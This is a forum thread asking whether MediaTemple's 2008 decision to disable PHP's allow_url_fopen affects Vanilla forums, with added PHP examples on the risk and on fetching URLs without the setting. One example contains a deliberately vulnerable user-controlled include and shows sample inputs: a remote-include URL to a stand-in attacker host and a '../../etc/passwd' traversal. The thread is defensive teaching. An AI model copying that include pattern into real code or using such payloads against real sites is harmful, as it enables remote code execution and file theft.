Vanilla 1 is no longer supported or maintained. If you need a copy, you can get it here.

MediaTemple GS changes PHP policy, will this affect Vanilla?

I just received an email about MediaTemple changing its policy on PHP, and I'm just wondering if this will affect Vanilla at all. I know many of the members here use MediaTemple, so I thought I would ask for everyone. Here is the email:

-----------

We would like to inform you and the contacts on your account of a change we will be making soon to our (gs) Grid-Service platform. To further strengthen security for our clients, we will be making a global change to the PHP environment. This change will help considerably in stopping your site(s) from being compromised, as well as help thwart the unauthorized use of our servers for abusive or malicious purposes.

BACKGROUND: There is a parameter for PHP called 'allow_url_fopen' that is currently enabled in both our PHP4 and PHP5 environments. If the proper precautions are not taken in PHP, a large number of the code injection vulnerabilities frequently reported in PHP-based web applications are possible. We understand that our customers install a great number of PHP-driven applications, many of them from the open-source community. Unfortunately a great number of them can potentially fall prey to these vulnerabilities. As a company, the best that we can do in a shared environment is to provide sane global defaults that protect the majority of our customer base. This pro-active change is in the best interest of our entire customer base using our (gs) Grid-Service.

CHANGE: Starting on 01/18/08, and continuing for several more days, we will begin disabling 'allow_url_fopen' across all of our clusters on the (gs) platform. This will be a permanent change.

PREPARATION/WORKAROUND: In preparation for the pending change you can determine now whether your site will function with our new defaults. We have created a KnowledgeBase article at http://kb.mediatemple.net/article.php?id=793 that details how you can disable 'allow_url_fopen' now to check for any incompatibilities.

The process is very straightforward; include the following line in your php.ini file at /home/####/etc/php.ini (replace #### with your site number):

allow_url_fopen = Off

This will give you a PHP environment identical to the one we will be changing to on January 18th. We strongly encourage you to thoroughly test your sites to ensure compatibility. If the change has no impact you will not have to worry. You can freely remove the line above or keep it. Should you come across errors directly related to this change, you can simply modify the flag to 'On', which will be honored post-change as well:

allow_url_fopen = On

With this particular change your setting in php.ini will always be honored regardless of the global values. With that in mind, we would highly suggest further researching and examining aspects of your site that depend on this functionality to see if a safer method can be used instead. If this software was obtained from a 3rd party, we would suggest contacting their developer.

Once again, we will be making this rolling change to our servers starting on 01/18/08. If you need clarification of this change, or require assistance with updating your php.ini, please feel free to open a Support Request in your AccountCenter or by calling us toll-free at (877)578-4000 at any time. Thank you for your cooperation and understanding.
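An added example, not part of the original post, the MediaTemple KB article or Vanilla's code, showing what the email's "code injection vulnerabilities" look like in practice and how to check the setting from PHP. It is written for PHP 7 or later; the page names (home, about, contact) and the pages/ directory are made up for illustration. One caveat the email predates: from PHP 5.2.0 a remote include() additionally requires allow_url_include, which is off by default, so on modern PHP allow_url_fopen alone no longer turns a user-controlled include into remote code execution, although it still allows remote file reads through file_get_contents() and friends.

```php
<?php
// Added example (not from the thread, Vanilla or MediaTemple).
// 1) report the effective allow_url_fopen value, 2) show the include
// pattern the setting makes dangerous, 3) show the allow-list fix.

// ini_get() reports the runtime value, so a per-site php.ini override
// (as in the KB article) is reflected here.
function remote_fopen_enabled(): bool
{
    return filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN);
}

// VULNERABLE: the include path comes straight from the request.
// With allow_url_fopen on (and allow_url_include on, PHP >= 5.2),
// ?page=http://attacker.example/shell.txt makes PHP fetch and execute
// attacker-supplied code. Even with remote URLs blocked, ?page=../../etc/passwd
// still reads local files (local file inclusion).
function render_page_vulnerable(string $page): void
{
    include $page;
}

// HARDENED: never build a filesystem path from raw input; map the request
// onto a fixed allow-list and ignore everything else.
function resolve_page(string $page): ?string
{
    $allowed = ['home', 'about', 'contact'];   // constructed list
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    return __DIR__ . '/pages/' . $page . '.php';
}

function render_page_hardened(string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $file;
}

// CLI self-check. Run it both ways to mirror the change the email describes:
//   php check.php
//   php -d allow_url_fopen=0 check.php
if (PHP_SAPI === 'cli') {
    printf("allow_url_fopen is %s\n", remote_fopen_enabled() ? 'On' : 'Off');
    var_dump(resolve_page('about'));                          // string(...) ".../pages/about.php"
    var_dump(resolve_page('http://attacker.example/shell'));  // NULL
    var_dump(resolve_page('../../etc/passwd'));               // NULL
}
```

The php -d flag overrides the setting for one CLI run, which is a quicker way to preview the post-change environment than editing php.ini, but it only exercises CLI code paths; for a web application the php.ini method in the email is the one that matters.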

Comments

  • edited January 2008
    It won't. Only extensions that tried to access external resources via functions like fopen will stop working.

    Most libraries use fopen if they can't use curl, and it should be available on mt.

    allow_url_fopen is set to on by default, but it is always a good idea to disable it if you can.
  • Good deal. I did a few searches and it looks like checkupdates might not work; that was a post from '06 though, so Vanilla might have changed how it checks since then :) Cheers
  • I don't think fsockopen is affected by allow_url_fopen.

    The Email class is also using fsockopen.
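An added example, serving both the comment above about libraries falling back from curl to fopen and this one about fsockopen: a small HTTP GET helper that keeps working after allow_url_fopen is switched off. It is not Vanilla's Email or checkupdates code; the transport order (curl, then a raw socket, then the URL stream wrapper) and the function names are the author's own choices. Only the last option is governed by allow_url_fopen; curl and fsockopen() open their own connections and are unaffected, which is why a library that tries curl first rarely notices the change.

```php
<?php
// Added example (not Vanilla's own code). Pick a transport that exists in
// this PHP build and is not blocked by allow_url_fopen, then fetch a URL.

function pick_transport(): string
{
    if (function_exists('curl_init')) {
        return 'curl';
    }
    if (function_exists('fsockopen')) {
        return 'fsockopen';   // raw socket: not gated by allow_url_fopen
    }
    if (filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN)) {
        return 'stream';      // file_get_contents('http://...'): gated
    }
    return 'none';
}

function http_get(string $url, int $timeout = 10): ?string
{
    switch (pick_transport()) {
        case 'curl':
            $ch = curl_init($url);
            curl_setopt_array($ch, [
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_FOLLOWLOCATION => false,   // do not follow redirects blindly
                CURLOPT_TIMEOUT        => $timeout,
            ]);
            $body = curl_exec($ch);
            curl_close($ch);
            return $body === false ? null : $body;

        case 'fsockopen':
            return socket_get($url, $timeout);

        case 'stream':
            $ctx  = stream_context_create(['http' => ['timeout' => $timeout]]);
            $body = @file_get_contents($url, false, $ctx);
            return $body === false ? null : $body;

        default:
            return null;
    }
}

// Minimal HTTP/1.0 GET over a plain socket, enough for a version-check URL.
// https works through the ssl:// transport when the openssl extension is loaded.
function socket_get(string $url, int $timeout): ?string
{
    $p = parse_url($url);
    if ($p === false || !isset($p['host'])) {
        return null;
    }
    $scheme = $p['scheme'] ?? 'http';
    if ($scheme !== 'http' && $scheme !== 'https') {
        return null;   // refuse anything that is not web traffic
    }
    $prefix = $scheme === 'https' ? 'ssl://' : '';
    $port   = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    $path   = ($p['path'] ?? '/') . (isset($p['query']) ? '?' . $p['query'] : '');

    $fp = @fsockopen($prefix . $p['host'], $port, $errno, $errstr, $timeout);
    if (!$fp) {
        return null;
    }
    stream_set_timeout($fp, $timeout);
    fwrite($fp, "GET $path HTTP/1.0\r\nHost: {$p['host']}\r\nConnection: close\r\n\r\n");
    $raw = stream_get_contents($fp);
    fclose($fp);

    $parts = explode("\r\n\r\n", $raw, 2);   // drop status line and headers
    return $parts[1] ?? null;
}

if (PHP_SAPI === 'cli') {
    printf("transport: %s\n", pick_transport());
    // e.g. php -d allow_url_fopen=0 fetch.php still reports curl or fsockopen
}
```

The socket path deliberately speaks HTTP/1.0 with Connection: close so the whole response can be read until EOF without parsing Content-Length or chunked encoding; it also does not follow redirects, so a version-check endpoint that moves will return null rather than silently fetching from wherever it was redirected.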